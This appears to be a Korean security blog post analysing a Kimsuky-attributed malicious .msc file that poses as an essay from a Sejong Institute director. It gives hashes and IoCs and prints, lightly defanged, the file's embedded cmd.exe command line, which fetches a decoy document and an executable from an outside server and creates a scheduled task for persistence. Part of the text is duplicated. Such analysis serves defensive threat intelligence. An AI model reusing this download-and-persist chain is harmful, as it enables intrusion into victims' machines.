북한 김수키(Kimsuky) 세종연구소 한반도전략센터장 을 사칭 하는 악성코드-CHEONG ??? Chang Essay FINAL.msc(2024.9.25)
Contents
오늘은 북한 김수키(Kimsuky) 세종연구소 한반도전략센터장을 사칭 하는 악성코드-CHEONG ??? Chang Essay FINAL.msc(2024.9.25)에 대해 글을 적어 보겠습니다. 일단 한 달 전에 확보한 샘플인데 나중에 쓸려고 사실상 내버려둬 두었던 샘플을 지금 쓰게 됩니다. 일단 해당 악성코드 세종 연구소를 타겟을 하고 있으며 세종 연구소 나는 모르겠다. 하면 1983년 12월 설립된 외교부 소관 국가정책연구재단이며 남북의 창이나 TV 뉴스 볼 때마다 본 연구소 소속 연구원 분들입니다.
아마도 세종 연구소에 계시는 한반도전략센터장 분을 이름이 있는 것 보니 한반도전략센터장이라고 이름을 도용해서 대북 관계자 분들을 노리는 방법이 아닐까 생각이 됩니다. 일단 악성코드 해시 값입니다.
파일명:?????-???+Essay+FINAL.msc
사이즈:142 KB
MD5:90a7f83dd9cf5e58044cdf56e8ed7079
SHA-1:1080b6fb2060cda252145548d1624a2fd86bd728
SHA-256:fd65c7a42458d05219cd6dad15b8ba28712a2d52e2f10a2060341aa03aedbab8
이름은 비공개 처리했습니다. 왜 한국전략센터장 분이라서….
악성코드 내부 코드
<ConsoleTaskpad ListSize="Medium" IsNo(d)eSpecific="true" ReplacesDefaultView(=)"
true" NoResults="true" DescriptionsAsText="true" NodeType="{C96401CE-0E17-11
D3-885B-00C(0)4F72C717}" ID="{656F3A6(A)-1(A)63-4FC4-9C9B-4B75AF6DF3A3}">
<String Name="Name" ID="19"/>
<String Name="Description" Value=""/>
<String Name="Tooltip" Value=""/>
<Tasks>
<Task Type="CommandLine" Command="cmd.exe">
<String Name="Name" ID="18"/>
<String Name="Description" ID="30"/>
<Symbol>
<Image Name="Small" BinaryRefIndex="6"/>
<Image Name="Large" BinaryRefIndex="7"/>
</Symbol>
<CommandLine Directory="" WindowS(t)ate="Minimized" Params="/c mod(e)
15,1&a(m)p;c(u)rl -o "(;)%temp%\(C)HEONG ?????-????+Essay+FINAL.docx&qu
ot; "hxxp://main(.)dkwis(.)kro(.)kr:8000/0918_uri_skle/dksleks?na=
view"&start explorer "%temp%\?????Seong-???/+Essay+FINAL(.)do
cx"&curl -o "%appdata%\sim" "hxxp://main(.)dkwi
s(.)kro(.)kr:8000/0918_uri_(s)kle/dksleks?na=myapp"&ren "%a
ppda(t)a%\sim" sim(.)exe&curl -o "%appdata%\sch_0918.xml&q
uot; "hxxp://main(.)dkwis(.)kro(.)kr:8000/0918_u(r)i_skle/dk
sleks?na=sch"&schtasks /create /tn TemporaryClearStatess
dfse /xml "%ap(p)data%\sch_0918.xml" /f&curl -o &qu
ot;%appdata%\sim.exe.manifest" "hxxp://main(.)dkwis(.)kro(.)kr:8000/0
918_uri_skle/d(k)sleks?na=myappfest"&exit"/>
</Task>
</Tasks>
악성코드 분석
주요 기능은 여러 파일을 외부 서버에서 다운로드
사용자 …
아마도 세종 연구소에 계시는 한반도전략센터장 분을 이름이 있는 것 보니 한반도전략센터장이라고 이름을 도용해서 대북 관계자 분들을 노리는 방법이 아닐까 생각이 됩니다. 일단 악성코드 해시 값입니다.
파일명:?????-???+Essay+FINAL.msc
사이즈:142 KB
MD5:90a7f83dd9cf5e58044cdf56e8ed7079
SHA-1:1080b6fb2060cda252145548d1624a2fd86bd728
SHA-256:fd65c7a42458d05219cd6dad15b8ba28712a2d52e2f10a2060341aa03aedbab8
이름은 비공개 처리했습니다. 왜 한국전략센터장 분이라서….
악성코드 내부 코드
<ConsoleTaskpad ListSize="Medium" IsNo(d)eSpecific="true" ReplacesDefaultView(=)"
true" NoResults="true" DescriptionsAsText="true" NodeType="{C96401CE-0E17-11
D3-885B-00C(0)4F72C717}" ID="{656F3A6(A)-1(A)63-4FC4-9C9B-4B75AF6DF3A3}">
<String Name="Name" ID="19"/>
<String Name="Description" Value=""/>
<String Name="Tooltip" Value=""/>
<Tasks>
<Task Type="CommandLine" Command="cmd.exe">
<String Name="Name" ID="18"/>
<String Name="Description" ID="30"/>
<Symbol>
<Image Name="Small" BinaryRefIndex="6"/>
<Image Name="Large" BinaryRefIndex="7"/>
</Symbol>
<CommandLine Directory="" WindowS(t)ate="Minimized" Params="/c mod(e)
15,1&a(m)p;c(u)rl -o "(;)%temp%\(C)HEONG ?????-????+Essay+FINAL.docx&qu
ot; "hxxp://main(.)dkwis(.)kro(.)kr:8000/0918_uri_skle/dksleks?na=
view"&start explorer "%temp%\?????Seong-???/+Essay+FINAL(.)do
cx"&curl -o "%appdata%\sim" "hxxp://main(.)dkwi
s(.)kro(.)kr:8000/0918_uri_(s)kle/dksleks?na=myapp"&ren "%a
ppda(t)a%\sim" sim(.)exe&curl -o "%appdata%\sch_0918.xml&q
uot; "hxxp://main(.)dkwis(.)kro(.)kr:8000/0918_u(r)i_skle/dk
sleks?na=sch"&schtasks /create /tn TemporaryClearStatess
dfse /xml "%ap(p)data%\sch_0918.xml" /f&curl -o &qu
ot;%appdata%\sim.exe.manifest" "hxxp://main(.)dkwis(.)kro(.)kr:8000/0
918_uri_skle/d(k)sleks?na=myappfest"&exit"/>
</Task>
</Tasks>
악성코드 분석
주요 기능은 여러 파일을 외부 서버에서 다운로드
사용자 …
IoC
121.66.72.110
http://main.dkwis.kro.kr:8000/0918_uri_skle/dksleks?na=
http://main.dkwis.kro.kr:8000/0918_uri_skle/dksleks?na=